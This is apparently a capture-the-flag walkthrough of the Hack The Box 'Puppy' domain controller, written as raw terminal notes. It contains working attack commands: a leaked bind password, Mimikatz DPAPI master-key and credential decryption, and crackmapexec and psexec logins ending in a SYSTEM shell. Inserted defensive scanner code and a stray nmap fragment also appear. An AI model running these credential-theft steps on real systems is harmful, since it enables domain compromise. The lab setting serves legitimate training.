┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# cd site-backup

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/site-backup]
└─# ls
site-backup-2024-12-30.zip

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/site-backup]
└─# unzip site-backup-2024-12-30.zip

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY/site-backup]
└─# cd puppy

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/site-backup/puppy]
└─# ls
assets  images  index.html  nms-auth-config.xml.bak

┌──(root㉿kali)-[/home/…/BOXES/PUPPY/site-backup/puppy]
└─# cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
    <server>
        <host>DC.PUPPY.HTB</host>
        <port>389</port>
        <base-dn>dc=PUPPY,dc=HTB</base-dn>
        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
        <bind-password>ChefSteph2025!</bind-password>
    </server>
    <user-attributes>
        <attribute name="username" ldap-attribute="uid" />
        <attribute name="firstName" ldap-attribute="givenName" />
        <attribute name="lastName" ldap-attribute="sn" />
        <attribute name="email" ldap-attribute="mail" />
    </user-attributes>
    <group-attributes>
        <attribute name="groupName" ldap-attribute="cn" />
        <attribute name="groupMember" ldap-attribute="member" />
    </group-attributes>
    <search-filter>
        <filter>(&(objectClass=person)(uid=%s))</filter>
    </search-filter>
</ldap-config>

steph.cooper:ChefSteph2025! 

steph.cooper credential discovered !
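
The root cause here is a plaintext bind password left in a .bak file inside a backup archive. The following is an added example, not part of the original notes: a scanner a defender could run over backup archives before they land on a share. Note that the config above is not well-formed XML (the unescaped & in the filter), so a strict parser alone would miss it; the extension list, the name patterns and the sample archive are assumptions and constructed values.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Element/attribute names that usually hold a secret (assumed pattern list).
SECRET_NAME = re.compile(r"pass(word|wd)?|secret|api[-_]?key|token", re.I)
# Fallback for files that are not well-formed XML: <tag ...>value</tag>
TAG_VALUE = re.compile(r"<([A-Za-z_][\w.-]*)[^<>]*>([^<>]+)</\1\s*>")
CONFIG_EXT = (".xml", ".bak", ".old", ".config", ".conf", ".ini")
MAX_BYTES = 1_000_000  # skip large members; configs are small


def scan_bytes(name, data):
    """Return findings for one file. Values are never echoed, only their length."""
    try:
        # For untrusted archives, a hardened parser such as defusedxml is preferable.
        root = ET.fromstring(data)
        pairs, parser = [], "xml"
        for el in root.iter():
            pairs.append((el.tag, el.text or ""))
            pairs.extend(el.attrib.items())
    except ET.ParseError:
        # e.g. an unescaped '&' in an LDAP filter breaks strict parsing
        pairs = TAG_VALUE.findall(data.decode("utf-8", "replace"))
        parser = "regex-fallback"
    findings = []
    for key, value in pairs:
        field = key.rsplit("}", 1)[-1]  # drop an XML namespace prefix, if any
        if SECRET_NAME.search(field) and value.strip():
            findings.append({"file": name, "field": field,
                             "chars": len(value.strip()), "parser": parser})
    return findings


def scan_zip(blob):
    """Scan config-like members of a zip archive held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_BYTES:
                continue
            if info.filename.lower().endswith(CONFIG_EXT):
                findings += scan_bytes(info.filename, zf.read(info))
    return findings


def build_sample_zip():
    """Constructed archive modelled on the backup above; all values are placeholders."""
    bak = b"""<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
    <server>
        <host>DC.EXAMPLE.TEST</host>
        <bind-dn>cn=svc.bind,dc=example,dc=test</bind-dn>
        <bind-password>CONSTRUCTED-PLACEHOLDER</bind-password>
    </server>
    <search-filter>
        <filter>(&(objectClass=person)(uid=%s))</filter>
    </search-filter>
</ldap-config>
"""
    web = (b'<?xml version="1.0"?><configuration>'
           b'<db user="svc_web" password="CONSTRUCTED-TOO"/></configuration>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("puppy/nms-auth-config.xml.bak", bak)
        zf.writestr("puppy/web.config", web)
        zf.writestr("puppy/index.html", b"<html><body>site</body></html>")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_zip()):
        print(finding)
```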

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]                                                                                                             
└─# crackmapexec smb 10.129.113.196 -u steph.cooper -p ChefSteph2025!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.113.196  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.113.196  445    DC               [+] PUPPY.HTB\steph.cooper:ChefSteph2025!

┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# crackmapexec winrm 10.129.113.196 -u steph.cooper -p ChefSteph2025!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.113.196  5985   DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:PUPPY.HTB)
HTTP        10.129.113.196  5985   DC               [*] http://10.129.113.196:5985/wsman
WINRM       10.129.113.196  5985   DC               [+] PUPPY.HTB\steph.cooper:ChefSteph2025! (Pwn3d!)


┌──(root㉿kali)-[/home/kali/BOXES/PUPPY]
└─# evil-winrm -i 10.129.113.196 -u steph.cooper -p ChefSteph2025!

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> whoami
puppy\steph.cooper
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> hostname
DC


steph.cooper SHELL ! 


steph.cooper -> steph.cooper_adm: 

donpapi collect -t 10.129.113.196 -d puppy.htb -u steph.cooper -p 'ChefSteph2025!'   #NOPE

Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\ -Force

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials> Get-ChildItem C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\ -Force



    Directory: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   8:14 AM          11068 DFBE70A7E5CC19A398EBF1B96859CE5D


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials>

Import-Module .\Invoke-Mimikatz.ps1 

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::dpapi" "exit"'

#NOPE, no master key found in sekurlsa::dpapi.

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D" "exit"'

mimikatz(powershell) # dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {556a2412-1275-4ccf-b721-e6a0b4f90407}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data
  
[SNIP] 

556a2412-1275-4ccf-b721-e6a0b4f90407 - Master Key 

Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Local\Microsoft\Protect\


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft> cd Protect
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> dir


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         2/23/2025   2:36 PM                S-1-5-21-1487982659-1829050783-2281216199-1107

Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> Get-ChildItem -Hidden C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107



    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:40 AM            740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs-         2/23/2025   2:36 PM             24 Preferred


556a2412-1275-4ccf-b721-e6a0b4f90407 = Master Key. 
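
How the guidMasterKey field ties a credential blob to a file under Protect\<SID>, as an added example (not part of the original notes and not mimikatz code): a Python parser for the fixed DPAPI blob header fields that dpapi::cred prints above, run on a constructed header with no key material or ciphertext. The function names, the offset parameter and the 12-byte file wrapper noted in the comment are assumptions for illustration.

```python
import struct
import uuid

# Fixed part of a DPAPI blob header, in the order dpapi::cred prints it:
# dwVersion, guidProvider, dwMasterKeyVersion, guidMasterKey, dwFlags, dwDescriptionLen
HEADER = struct.Struct("<I16sI16sII")
CRYPTPROTECT_SYSTEM = 0x20000000  # shown as "(system ; )" in the output above


def build_sample_blob() -> bytes:
    """Constructed sample: header fields from the notes, no key material or ciphertext."""
    desc = "Local Credential Data\r\n\0".encode("utf-16-le")  # 48 bytes = 0x30
    return HEADER.pack(
        1,
        uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le,
        1,
        uuid.UUID("556a2412-1275-4ccf-b721-e6a0b4f90407").bytes_le,
        CRYPTPROTECT_SYSTEM,
        len(desc),
    ) + desc


def parse_dpapi_header(data: bytes, offset: int = 0) -> dict:
    """Parse the header at `offset`; on-disk credential files wrap the blob in a
    12-byte header (assumption: version, size, unknown), so pass offset=12 for those."""
    if len(data) - offset < HEADER.size:
        raise ValueError("too short for a DPAPI blob header")
    ver, prov, mk_ver, mk, flags, dlen = HEADER.unpack_from(data, offset)
    start = offset + HEADER.size
    if dlen % 2 or start + dlen > len(data):
        raise ValueError("description length is odd or runs past the data")
    return {
        "dwVersion": ver,
        "guidProvider": str(uuid.UUID(bytes_le=prov)),  # GUIDs are stored mixed-endian
        "dwMasterKeyVersion": mk_ver,
        "guidMasterKey": str(uuid.UUID(bytes_le=mk)),
        "system_flag": bool(flags & CRYPTPROTECT_SYSTEM),
        "szDescription": data[start:start + dlen].decode("utf-16-le").rstrip("\r\n\0"),
    }


def masterkey_file(profile: str, sid: str, header: dict) -> str:
    """Master key files are named after the GUID, under Protect\\<SID> in the profile."""
    return rf"{profile}\AppData\Roaming\Microsoft\Protect\{sid}\{header['guidMasterKey']}"


if __name__ == "__main__":
    hdr = parse_dpapi_header(build_sample_blob())
    print(hdr)
    print(masterkey_file(r"C:\Users\steph.cooper",
                         "S-1-5-21-1487982659-1829050783-2281216199-1107", hdr))
```

The same GUID-to-file mapping is what makes the Protect folder worth monitoring: any read of a master key file by a process other than the owning user's DPAPI calls is a useful audit signal.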


Works !: 

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit""'

[masterkey] with password: ChefSteph2025! (protected user)
  key : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
  sha1: 3c3cf2061dd9d45000e9e6b49e37c7016e98e701

[backupkey] without DPAPI_SYSTEM:
  key : 1a943a912fa315c7f9eced48870b613d9e75b467d13d618bbad9262ef3f2c567
  sha1: 469928729f9405d7ba46a22de53071b2e1d81fb9
  
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"'
  
#EMPTY = No credential discovered there. 

Time to check the other Microsoft Credentials folder, the one under Roaming:

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -force


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" "exit"'

mimikatz(powershell) # dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {556a2412-1275-4ccf-b721-e6a0b4f90407}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data


Same master key, so we are going to use the decrypted master key as before.


Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" "exit"'

[SNIP]

Decrypting Credential:
 * masterkey     : d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000c8 - 200
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 3/8/2025 3:54:29 PM
  unkFlagsOrSize : 00000030 - 48
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:target=PUPPY.HTB
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : steph.cooper_adm
  CredentialBlob : FivethChipOnItsWay2025!
  Attributes     : 0
  
steph.cooper_adm credential discovered ! 

steph.cooper_adm:FivethChipOnItsWay2025!

crackmapexec smb 10.129.113.196 -u steph.cooper_adm -p FivethChipOnItsWay2025!
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.20) or chardet (5.2.0)/charset_normalizer (2.0.11) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.129.113.196  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.113.196  445    DC               [+] PUPPY.HTB\steph.cooper_adm:FivethChipOnItsWay2025! (Pwn3d!)

sudo rlwrap psexec.py 'puppy.htb/steph.cooper_adm:FivethChipOnItsWay2025!@10.129.113.196'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.129.113.196.....
[*] Found writable share ADMIN$
[*] Uploading file dxtsuKPY.exe
[*] Opening SVCManager on 10.129.113.196.....
[*] Creating service PVaB on 10.129.113.196.....
[*] Starting service PVaB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.3453]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
DC

SYSTEM-SHELL ! 

C:\Users\Administrator\Desktop> whoami
nt authority\system

C:\Users\Administrator\Desktop> hostname
DC

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 311D-593C

 Directory of C:\Users\Administrator\Desktop

05/12/2025  07:34 PM    <DIR>          .
03/11/2025  09:14 PM    <DIR>          ..
05/27/2025  04:31 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,744,788,992 bytes free

C:\Users\Administrator\Desktop> type root.txt
REDIRECTED

ROOT.TXT: REDIRECTED



 
Didn't work !:

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/rpc" "exit"'

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"" "/sid:S-1-5-21-1487982659-1829050783-2281216199-1107" "/password:ChefSteph2025!" "/protected" "exit"'

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::masterkey /in:"C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107"" "/rpc" "exit"'

Invoke-Mimikatz -Command '""privilege::debug"" ""token::elevate"" ""dpapi::masterkey /in:""C:\Users\epugh\AppData\Roaming\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-ba29d263dda2"" ""/sid:S-1-5-21-1396373213-2872852198-2033860859-1151"" ""/password:Sarah2017"" ""/protected"" ""exit""'






9389/tcp  open  mc-nmf     .NET Message Framing (Active Directory Web Services - adws)
49664/tcp open  msrpc      Microsoft Windows RPC
49667/tcp open  msrpc      Microsoft Windows RPC
49669/tcp open  msrpc      Microsoft Windows RPC
49670/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc      Microsoft Windows RPC
55868/tcp open  msrpc      Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-05-23T00:32:38
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
|_clock-skew: 6h59m55s

----------------------Starting UDP Scan------------------------



PORT     STATE SERVICE
53/udp   open  domain
111/udp  open  rpcbind
123/udp  open  ntp
389/udp  open  ldap
2049/udp open  nfs

PORT     STATE SERVICE VERSION
53/udp   open  domain  (generic dns response: SERVFAIL)
| fingerprint-strings:
|   NBTStat:
|_    CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
111/udp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
123/udp  open  ntp     NTP v3
389/udp  open  ldap    Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
2049/udp open  mountd  1-3 (RPC #100005)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows